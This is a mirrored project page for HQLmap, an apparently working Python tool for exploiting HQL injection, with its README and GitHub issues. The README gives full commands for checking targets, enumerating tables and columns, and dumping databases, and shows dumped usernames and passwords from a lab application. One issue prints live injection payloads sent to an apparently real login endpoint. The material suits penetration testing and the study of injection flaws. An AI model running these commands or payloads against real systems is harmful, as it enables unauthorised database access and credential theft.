Code Monkey home page Code Monkey logo

hqlmap's Introduction

HQLMap

This project has been created to exploit HQL Injections. The tool has been written in Python and is released under MIT License. Future development : I have in mind to develop specific module for SQLmap.

Where can you try the tool ?

If you want a fast vulnerable environment where you can try the tool, I would recommend using RopeyTasks : https://github.com/continuumsecurity/RopeyTasks/

Moreover, if you want further information regarding HQLi, check this blog post : http://blog.h3xstream.com/2014/02/hql-for-pentesters.html

Installation

To install this project, you just have to clone this project by typing :

git clone [email protected]:PaulSec/HQLmap.git

Usage

TO use this project, go in the directory :

cd HQLmap

And launch the project :

python HQLmap.py

Usage is then displayed :

Usage: HQLmap.py [options]

Options:
  -h, --help            show this help message and exit
  --url=URL             qURL to pentest
  --cookie=COOKIE       Cookie to test it
  --param=PARAM         Param to test
  --postdata=POSTDATA   Postdata (POST Method)  
  --message=BLIND_HQLI_MESSAGE
                        Message appearing while Blind HQLi
  --tables              Tries to gather as much tables as possible (With
                        Bruteforce)
  --T=TABLE             Name of the table you want to get
  --table_name_file=FILE_TABLE
                        DB file for name of tables
  --columns             Tries to gather as much columns as possible (With
                        Bruteforce)
  --C=COLUMN            Name of the column you want to get
  --column_name_file=FILE_COLUMN
                        DB file for name of columns
  --check               Check if host is vulnerable
  --user                Tries to get user() from dbms
  --count               Get count of specified table(s)
  --dump                Dump specified table(s) / column(s)
  --results             Enumerate results after session
  --verbose             Verbose mode

Usage

This part includes different scenarios.

Checking if host is vulnerable

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --check

The output is really simple :

Host seems vulnerable.

Checking with POSTDATA

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=A101D5D76A260E9ECD2E10ADE9DF0E47" --T=User --results --dump --postdata="username=Test&password=Test!!!"

Enumerating tables

$ python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --tables

Here is the output :

[!] Table User has been found.
[!] Table Task has been found.
[-] Table News does not exist.
[-] Table Test does not exist.

By performing such enumeration, the scanner is using default file for the name of the tables if not specified. The default file is : db/tables.db

Enumeration columns

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --tables --columns

[!] Table User has been found.
[!] Table Task has been found.
[-] Table News does not exist.
[-] Table Test does not exist.
[!] Column Id has been found in table Task
[-] Column username in Task does not exist.
[-] Column password in Task does not exist.
[!] Column Status has been found in table Task
[-] Column user_id in Task does not exist.
(...)
[!] Column Password has been found in table User
[-] Column status in User does not exist.
[-] Column user_id in User does not exist.
[!] Column Email has been found in table User
[!] Column Firstname has been found in table User
[!] Column Lastname has been found in table User

By performing such enumeration, the scanner is using default file for the name of the tables AND for the name of the columns. Default files are :

For tables : db/tables.db For columns : db/columns.db

Checking existence of a specific table

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --T=foo

And the output :

[-] Table foo does not exist.

Enumerating columns of a specific table

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --T=User --columns

And the output :

[!] Table User has been found.
[!] Column Id has been found in table User
[!] Column Username has been found in table User
[!] Column Password has been found in table User
[-] Column status in User does not exist.
[-] Column user_id in User does not exist.
[!] Column Email has been found in table User
[!] Column Firstname has been found in table User
[!] Column Lastname has been found in table User

Checking the existence of a specific column for a specific table

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --T=User --C=bar

And the output :

[!] Table User has been found.
[-] Column bar in User does not exist.

Fingerprinting options

Retrieving the count of a table

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --message="Eggs, Milk and Cheese baby, yeah." --T=User --count

Or for all tables :

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --message="Eggs, Milk and Cheese baby, yeah." --tables --count

And the output :

[!] Table User has been found.
[!] Count(*) of User : 3

Retrieving user of the database

To do such action, you need to specify a table (or all with --tables flag) and add --user flag this way :

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --message="Eggs, Milk and Cheese baby, yeah." --T=User --user

And the output (after few secs) :

[!] Table User has been found.
[!] Username of Database found : SA

To retrieve the user, I implemented an algorithm really similar to a "variable" dichotomy.

Dumping database

All tables from database

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=83C59DCB04A6DC954E4E1EEC2BB36EF6" --tables --columns --dump

And the output :

(redacted)
[Task]
  [Name]
     - Bob's shopping
     - Alice's shopping
[Task]
  [User_Id]
     - 1
     - 2
[User]
  [Id]
     - 1
     - 2
     - 3
[User]
  [Username]
     - bob
     - alice
     - admin
(redacted)

Specific table from database

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=83C59DCB04A6DC954E4E1EEC2BB36EF6" --T=User --columns --dump

And the output:

[User]
  [Id]
     - 1
     - 2
     - 3
[User]
  [Username]
     - bob
     - alice
     - admin
[User]
  [Password]
     - password
     - password
     - password
[User]
  [Email]
     - [email protected]
     - [email protected]
     - [email protected]
[User]
  [Firstname]
     - Robert
     - Alice
     - Administrator
[User]
  [Lastname]
     - McBride
     - O'Reilly
     - Reynolds

Specific column from database

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=83C59DCB04A6DC954E4E1EEC2BB36EF6" --T=User --C=username --dump

And the output :

[!] Table User has been found.
[!] Column Username has been found in table User
[User]
  [username]
     - bob
     - alice
     - admin

Conclusion (& License)

Feel free to give feedbacks and ask for new features.

Project released under MIT license.

hqlmap's People

Contributors

paulsec avatar theguly avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

idkwim zhangwz executioner99 forbidden-ali akiraaisha h4ckl4bm3 dit81 0rbytal noscripter cinno cr2zyivan mrmugiwara cyber-forensic badfish5150 lokori pengyoukele8 v1cker yeshuibo feniczy heiye007 h5xxxoo deelmind scopion 01001000entai hybridious jumbo-wjb hy-nk arongmh ykankaya comahax jackchan1024 seabreg niummm dtrizna 5l1v3r1 open-sec hartl3y94 walkingdisaster39 samuelmazilu2 wargg trngca rakhithjk liehu bowojori7 spwn3r49sd3r00 iq-scm

hqlmap's Issues

Clean URL support

Hello,

Is it possible to test for HQL injection vulnerabilities with using HQLmap with a url that is using mod rewrite (or something like it) to make the urls clean?

I know how to test my sites that have urls like: http://mysite.com/?id=1

But what about my sites that have clean urls, like: http://mysite.com/1
Thanks.

Eliminate False Positives

Hello @PaulSec ,

I tried running this one on my very own Apache Server which doesn't have a db on but just a static page and here is the output:

shipcod3@arfarf:~/pentest/HQLmap$ python HQLmap.py --url="http://localhost?id=jay" --param=id --tables --columns
[!] Table User has been found.
[!] Table Task has been found.
[!] Table News has been found.
[!] Table Test has been found.
[!] Column Id has been found in table Test
[!] Column Username has been found in table Test
[!] Column Password has been found in table Test
[!] Column Status has been found in table Test
[!] Column User_Id has been found in table Test
[!] Column Email has been found in table Test
[!] Column Firstname has been found in table Test
[!] Column Lastname has been found in table Test
[!] Column Id has been found in table News
[!] Column Username has been found in table News
[!] Column Password has been found in table News
[!] Column Status has been found in table News
[!] Column User_Id has been found in table News
[!] Column Email has been found in table News
[!] Column Firstname has been found in table News
[!] Column Lastname has been found in table News
[!] Column Id has been found in table Task
[!] Column Username has been found in table Task
[!] Column Password has been found in table Task
[!] Column Status has been found in table Task
[!] Column User_Id has been found in table Task
[!] Column Email has been found in table Task
[!] Column Firstname has been found in table Task
[!] Column Lastname has been found in table Task
[!] Column Id has been found in table User
[!] Column Username has been found in table User
[!] Column Password has been found in table User
[!] Column Status has been found in table User
[!] Column User_Id has been found in table User
[!] Column Email has been found in table User
[!] Column Firstname has been found in table User
[!] Column Lastname has been found in table User

I guess on 200 status code pages, it just gives the default tables and columns. I tried this one and Google and it has the same output.

table_exists methed is not perfect 

def table_exists(message):
    if ('is not mapped' in message):
        return False
    else:
        return True

The method of checking table exists is check if 'is not mapped' string in response.
I'm doubt about this method, and I have an fail example.
This is the request url

?isAsc=false&orderBy=name&pageNum=1&pageSize=10

The response is

{"result":"failed","responseCode":"","data":"","errorMsg":"org.hibernate.QueryException: could not resolve property: name of:com.xxx\n\tat org.hibernate.persister.entity.AbstractPropertyMapping.propertyException(AbstractPropertyMapping.java:83

This request is order by a column, if the column does not exist, it will response this exception. I do not think this is a sqli vulnerability.

Ignores post parameters

Seems the tool always tries to inject in URL parameters even if --postdata is present, e.g.:

python HQLmap.py --url="http://localhost:9110/ropeytasks/user/index" --postdata="username=bob&password=&_action_login=Login"

Traceback (most recent call last):
  File "HQLmap.py", line 360, in <module>
    params = opts.url.split('?')[1]
IndexError: list index out of range

parameter '--columns' and '--C' do not work without parameter '--tables'

Description

There is some Logical problems with parameter '--tables'.
The problem just as the issues' title.

Detail

x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.

x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --co
lumns
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find columns for table com_recruit.entity.sysuser.hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found (again).
Traceback (most recent call last):
  File "X:\hqlmap\HQLmap.py", line 459, in <module>
    find_columns(opts.file_column, opts.table)
  File "X:\hqlmap\HQLmap.py", line 161, in find_columns
    find_column(table_name, column)
  File "X:\hqlmap\HQLmap.py", line 170, in find_column
    raise Exception('Table ' + table + ' does not exist ?')
Exception: Table com_recruit.entity.sysuser.hdzuser does not exist ?

x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --C
hdPassWord
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find column hdPassWord for table com_recruit.entity.sysuser.hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found (again).
Traceback (most recent call last):
  File "X:\hqlmap\HQLmap.py", line 471, in <module>
    find_column(opts.table, opts.column)
  File "X:\hqlmap\HQLmap.py", line 170, in find_column
    raise Exception('Table ' + table + ' does not exist ?')
Exception: Table com_recruit.entity.sysuser.hdzuser does not exist ?

x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --C
hdPassWord --tables
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Trying to gather as much tables..
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+User%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table User does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Task%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Task does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+News%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table News does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Test%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Test does not exist.
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find column hdPassWord for all tables
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.hdPassWord%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Hdpassword has been found in table Com_Recruit.Entity.Sysuser.Hdzuser

x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --co
lumns
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find columns for table com_recruit.entity.sysuser.hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found (again).
Traceback (most recent call last):
  File "X:\hqlmap\HQLmap.py", line 459, in <module>
    find_columns(opts.file_column, opts.table)
  File "X:\hqlmap\HQLmap.py", line 161, in find_columns
    find_column(table_name, column)
  File "X:\hqlmap\HQLmap.py", line 170, in find_column
    raise Exception('Table ' + table + ' does not exist ?')
Exception: Table com_recruit.entity.sysuser.hdzuser does not exist ?

x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --co
lumns --tables
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Trying to gather as much tables..
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+User%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table User does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Task%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Task does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+News%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table News does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Test%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Test does not exist.
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find columns for all tables
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.id%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Id has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.username%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Username has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.password%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Password has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.status%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Status has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.user_id%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column User_Id has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.email%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Email has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.firstname%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Firstname has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.lastname%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Lastname has been found in table Com_Recruit.Entity.Sysuser.Hdzuser

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.